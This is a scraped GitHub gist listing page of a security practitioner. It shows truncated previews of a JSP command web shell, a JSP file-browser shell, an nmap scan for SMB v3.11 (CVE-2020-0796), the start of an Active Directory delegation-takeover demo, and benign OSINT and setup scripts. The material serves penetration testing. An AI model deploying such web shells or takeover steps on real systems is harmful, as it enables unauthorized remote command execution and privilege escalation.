Skip to content

Instantly share code, notes, and snippets.

View nikallass's full-sized avatar

Nikita Medvedev nikallass

View GitHub Profile
@nikallass
nikallass / cmd.jsp
Created April 30, 2018 16:54
Simple JSP cmd shell
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
@nikallass
nikallass / Kali 2017.1 x64, Docker-ce Install script
Last active January 3, 2024 11:12
Kali 2017.1 x64, Docker-ce Install script
#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get remove docker docker-engine docker.io* lxc-docker*
# install dependencies 4 cert
#!/bin/bash
if [ "$1" == "-h" ] || [ "$1" == "--help" ]
then
me=`basename "$0"`
echo "Find information about TCP/IP ports."
echo -e "Usage:\n\t./${me} [port|service]"
echo -e "Example:\n\t./${me} snmp\n\t./${me} 3389"
exit 1
fi
@nikallass
nikallass / file-browser.jsp
Last active April 18, 2023 04:32
File browser + cmd JSP shell (win+linux without modification)
<%--
jsp File browser 1.2.1
nikallass added OS check, so shell can be executed on Windows and Linux without modifying now.
Copyright (C) 2003-2006 Boris von Loesch
This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or (at your option)
any later version.

Magnet links with URL param reges: magnet:\?xt=urn:[a-zA-Z0-9]+:[a-zA-Z0-9]{32,40}(&dn=.*|&tr=.*)*

@nikallass
nikallass / letsencrypt-webroot-apache.md
Created September 4, 2018 11:47 — forked from daronco/letsencrypt-webroot-apache.md
Letsencrypt with webroot on Apache

Config Apache with /etc/apache2/conf-available/le.conf:

Alias /.well-known/acme-challenge/ "/var/www/html/.well-known/acme-challenge/"
<Directory "/var/www/html/">
    AllowOverride None
    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
    Require method GET POST OPTIONS
</Directory>
@nikallass
nikallass / crt.sh
Last active October 14, 2021 21:47
Certificate Transparency OSINT tool. It uses https://crt.sh/ to query domain name.
#!/bin/bash
if [ "$1" == "-h" ] || [ "$1" == "--help" ] || [[ $# -eq 0 ]]
then
me=`basename "$0"`
echo "Find subdomains in certificate transparency log."
echo -e "Usage:\n\t./${me} [domain]"
echo -e "Example:\n\t./${me} example.com"
exit 1
fi
@nikallass
nikallass / ptrarc.sh
Last active April 30, 2021 16:50
Search PTRarchive for subdomains and IPs
#!/bin/bash
if [ "$1" == "-h" ] || [ "$1" == "--help" ] || [[ $# -eq 0 ]]
then
me=`basename "$0"`
echo "Find subdomains in PTR-archive http://ptrarchive.com/tools/search.htm?date=ALL&label=example.com"
echo -e "Usage:\n\t./${me} [domain]"
echo -e "Example:\n\t./${me} example.com"
echo -e "\t./${me} -v example.com # Verbose output, includes IPs."
exit 1
@nikallass
nikallass / check-smb-v3.11.sh
Created March 11, 2020 04:57
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" $1 "..."
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@nikallass
nikallass / rbcd_demo.ps1
Created January 21, 2020 12:20 — forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"